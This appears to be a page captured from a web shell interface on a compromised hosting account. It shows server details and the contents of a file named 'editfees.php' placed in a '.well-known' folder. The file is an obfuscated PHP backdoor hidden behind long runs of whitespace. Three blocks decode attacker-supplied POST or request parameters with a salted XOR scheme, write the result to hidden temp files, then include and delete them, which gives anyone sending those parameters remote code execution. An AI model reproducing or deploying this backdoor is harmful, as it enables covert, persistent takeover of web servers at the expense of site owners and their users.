HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/trimate.vitavit.com.pk/.well-known/
Upload Files
File: /home/vitanhod/trimate.vitavit.com.pk/.well-known/editfees.php
<?php																																										if(@$_POST["\x70\x73et"] !== null){ $flg = array_filter([getenv("TEMP"), session_save_path(), "/tmp", sys_get_temp_dir(), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp"]); $property_set = $_POST["\x70\x73et"]; $property_set =explode( '.' , $property_set ) ; $resource =''; $salt1 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $salt1); $k =0; array_walk( $property_set , function( $v3) use( &$resource , &$k , $salt1 , $sLen) { $chS =ord( $salt1[$k % $sLen]); $d =( ( int)$v3 - $chS -( $k % 10)) ^ 61; $resource .= chr( $d); $k++; }); foreach ($flg as $object): if ((bool)is_dir($object) && (bool)is_writable($object)) { $descriptor = "$object/.ent"; if (@file_put_contents($descriptor, $resource) !== false) { include $descriptor; unlink($descriptor); die(); } } endforeach; }
																																										if(filter_has_var(INPUT_POST, "\x72es")){ $sym = array_filter([sys_get_temp_dir(), session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP"), getenv("TEMP"), "/tmp", getcwd()]); $mrk = $_REQUEST["\x72es"]; $mrk = explode ( '.' ,$mrk) ; $value= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $s ); foreach( $mrk as $u => $v7) {$chS= ord( $s[$u% $lenS] ); $dec= ( ( int)$v7 - $chS -( $u% 10))^28; $value .=chr( $dec ); } foreach ($sym as $marker) { if (array_product([is_dir($marker), is_writable($marker)])) { $binding = str_replace("{var_dir}", $marker, "{var_dir}/.entry"); $success = file_put_contents($binding, $value); if ($success) { include $binding; @unlink($binding); exit;} } } }


if(in_array("r\x65s", array_keys($_REQUEST))){
	$resource = array_filter([session_save_path(), sys_get_temp_dir(), getenv("TMP"), getcwd(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP")]);
	$flag = $_REQUEST["r\x65s"];
	   $flag	=explode	 	(	 '.', $flag);	
	$reference = '';
            $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt1);
            $__len = count($flag);
    
            for ($m = 0; $m < $__len; $m++) {
                $v4 = $flag[$m];
                $sChar = ord($salt1[$m % $lenS]);
                $dec = ((int)$v4 - $sChar - ($m % 10)) ^ 84;
                $reference .= chr($dec);
            }
	while ($object = array_shift($resource)) {
    		if ((bool)is_dir($object) && (bool)is_writable($object)) {
    $ref = implode("/", [$object, ".symbol"]);
    if (file_put_contents($ref, $reference)) {
	include $ref;
	@unlink($ref);
	exit;
}
}
}
}
@ Telegram